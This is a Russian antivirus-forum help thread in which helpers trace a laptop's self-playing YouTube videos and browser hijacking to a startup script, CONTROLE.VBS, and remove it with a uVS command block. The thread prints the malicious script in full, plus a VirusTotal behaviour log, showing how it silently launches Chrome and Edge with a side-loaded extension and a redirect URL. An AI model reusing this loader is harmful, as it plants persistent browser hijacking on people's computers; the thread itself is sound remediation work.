Неуловимый вирус. Автоматически просматривает видео в ютубе.

RSS
Добрый вечер! Вот это прочитал https://forum.esetnod32.ru/forum6/topic5713/  Там написано, что нужно выполнить лог программой UVS! Так вот я скачал UVS и далее запустил.

Но возникла некоторая проблема!



У меня Windows 11 сейчас) Точно ли все нормально? (этот файл как раз из папки с программой UVS!)

У меня был windows 10 с установленным антивирусом "Касперский" (и постоянно запущенным). Где-то пару недель назад, каждый раз после перезагрузки ноута переставал открываться основной профиль в браузере Хром, а в диспетчере задач браузер отображался "как активный" (когда я его закрывал после того, как не смог открыть профиль), в это же время на 2-3 секунды воспроизводился какой-то звуковой фрагмент. Я заметил, что в истории просмотров на ютубе появлились какие-то видео с арабскими названиями малочисленных каналов на совершенно рандомную тематику (я их не смотрел, а короткие звуковые фрагменты были ровно из этих видеороликов).

     Я несколько раз делал полную проверку всего ПК Касперским (Total Secuirity), после его удалил и Windows Defender обнаружил несколько вирусов и обезвредил их (вирусы из серии "кейген"). Но и это никак не помогло, ситуация продолжалась.
     Я скачал Dr.Web cure it и он не нашел ничего (при полной проверке на вирусы). И после того, все новые видео в истории просмотров ютуба пополнялись. И еще, при этом ноут стал греться сильно.
    Вчера я решил обновиться до 11 windows, авось это поможет. Но я ошибся, это не помогло. Понятно дело, что можно переустановить windows, но я очень не хочу заново устанавливать кучу программ и вспомогательных утилит, которые нужно будет заново подстраивать под себя с нуля, а это очень и очень долго) Что можете посоветовать? Еще, все чаще появляется ошибка "kernel data inpage error"  и ноут сам перезагружается в произвольный момент времени (примерно раз в 3 дня такое происходит, но в windows 11 еще такого не было).
Помимо автоматического просмотра видео на арабском языке, еще попутно открывается вот этот сайт иногда.


Сегодня я еще устанавливал Bitdefender, он находил какие-то вирусы, но не те, ибо это не помогло, ситуация продолжала повторяться. Я сделал быструю проверку esetnod, уязвимостей найдено не было. Как подловить вирус(ы)?  
Изменено: Kot Obormot - 15.08.2022 21:55:44

Ответы

А возможно ли как-то сделать, чтобы не запускался Microsoft Edge? Я в программе CCleaner настроил программы, которые должны запускаться при старте системы. Среди них нет Microsoft Edge. А он еще и подъедает оперативную память и все равно запускается при старте системы. Может быть это еще как-то взаимосвязано?)



P.S. На всякий случай повторю свой ответ на предыдущей странице, так как его можно было не заметить.

Скачал, там (в портативной версии) никаких проблем не наблюдается, все хорошо открывается, никаких самооткрывающихся окон
Изменено: Kot Obormot - 17.08.2022 02:11:02
В Хроме есть:  Экспорт и импорт параметров.
В сети есть информация.
-------------
Есть программа Autoruns https://www.comss.ru/page.php?id=1064
чтобы программа _???_ не запускалась достаточно снять [v] в чек боксе... и всё - программа не запуститься. ( после перезапуска системы )
+ там есть строка поиска...  
Если что-то непонятно - то лучше это не трогать. :)
Хорошо, понял, спасибо большое! Еще я заметил, что есть seokistore в Microsoft Edge браузере. Но интересно, что это фоном открывается, в отличии от Хрома. И раньше это я даже не замечал (что там есть seokistore). Попробую все сделать, но уже скорее всего завтра)
Я удалил Microsoft Edge со следами. Но при старте windows почему-то все равно грузится служба обновления Microsoft Edge, это реально убрать? (крайне редко бывает нужен этот браузер).

Я удалил Хром со следами, но при повторной установке ситуация повторилась (даже в профиль не успел зайти, уже открывается странный сайт). Потому я решил пользоваться портативной версией, коли там проблем нет.

Попутно у меня при загрузке windows дважды антивирус находил вирус (один и тот же фактически).



Но мне написали из службы поддержки одного из антирвирусов различные варианты как справиться, один из них - выполнить чистую загрузку винды. Оказалось, что при пустой автозагрузке хром нормально запускается. А Виновник был найден методом исключения (на скриншоте). Правда

Теперь и обычный хром (не портативный) запускается без проблем). Правда этот vonrole.vbs может же еще как-то начудить, а я про это и знать не буду) Не знаю - что с ним делать далее) Понятно, что из автозагрузки его нужно убрать, но что это за зверь, можно ли его взять и удалить?)

Полное имя                  C:\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\CONTROLE.VBS
Имя файла                   CONTROLE.VBS
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                           
www.virustotal.com          2022-02-17 20:18 [2021-04-06] Файл был чист на момент проверки.

                           
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
Размер                      649 байт
Создан                      01.04.2021 в 22:38:31
Изменен                     25.03.2021 в 17:20:04
Цифр. подпись               Отсутствует либо ее не удалось проверить
                           
Доп. информация             на момент обновления списка
SHA1                        58367B32AAE4C92208268A1F4B50E37862FC0162
MD5                         0278DC59F174789C3D2AA24DD835FD3A
                           
#FILE#                      On Error Resume Next


Dim WShell
Set WShell = CreateObject("WScript.Shell")

WShell.Run "chrome.exe  --load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog ????://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000", 0
WShell.Run "msedge.exe  --load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog ????://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000", 0

Set WShell = Nothing


On Error Goto 0

                           
Ссылки на объект            
Ссылка                      C:\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP
---------------
Файл известен с 2021-04-06
И V.T. показывает, что он чист.
https://www.virustotal.com/gui/file/dd438f4ed90e30e4ed4897937390ef0a9507b88f03eac2a­323a00fb456420162?nocache=1
-----------------
Для удаления CONTROLE.VBS
Скопируйте текст КОДа - в буфер обмена.
uVS: start.exe, текущий пользователь, меню, скрипты - выполнить скрипт из буфера обмена.
ПЕРЕД ВЫПОЛНЕНИЕМ СКРИПТА, ЗАКРЫТЬ БРАУЗЕРЫ!
ВНИМАНИЕ : По окончанию выполнения скрипта компьютер выполнит перезагрузку !


Код
;uVS v4.11.12 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c
OFFSGNSAVE
;---------command-block---------
delall %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\CONTROLE.VBS
apply

restart

Изменено: RP55 RP55 - 17.08.2022 17:47:40
+
В общем с запуском системы запускался скрипт ( CONTROLE.VBS ) > браузер получал команду и выходил на сайт ХХХ с пере-направлением на другой сайт - и там уже этот сайт мог вам показывать всякое :)
Спасибо Вам большое! Я выполнил Ваш скрипт, теперь нет vbs в автозапуске) Получается, что проблема решена. Но, интересен тот факт, что перед тем, как выполнить скрипт, я загрузил этот файл на virustotal и там также никакой из антивирусов не нашел вируса)

P.S. Надо было, наверное, сделать резервную копию этого файла перед удалением... Эхъ
А то зверь-то оказался очень необычным)
И еще, на вирустотале никаких вирусов не нашлось, но как только я указал этот путь к файлу для проверки на вирустотале, мой антивирус сразу вновь сработал)

Цитата
Kot Obormot написал:
P.S. Надо было, наверное, сделать резервную копию этого файла перед удалением... Эхъ

На V.T в колонке: Behavior есть весть текст скрипта.

Код
1988 - c:/windows/system32/cscript.exe Controle.vbs
2264 - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog https://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000
2312 - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --type=crashpad-handler --user-data-dir=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Crashpad --metrics-dir=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=83.0.4103.97 --initial-client-data=0x18c,0x190,0x194,0x160,0x198,0x7feeaedbd28,0x7feeaedbd38,0x7feeaedbd48 
+
Если тема по вирусам\рекламе интересна.
https://forum.esetnod32.ru/forum8/topic15785/
Читают тему (гостей: 1)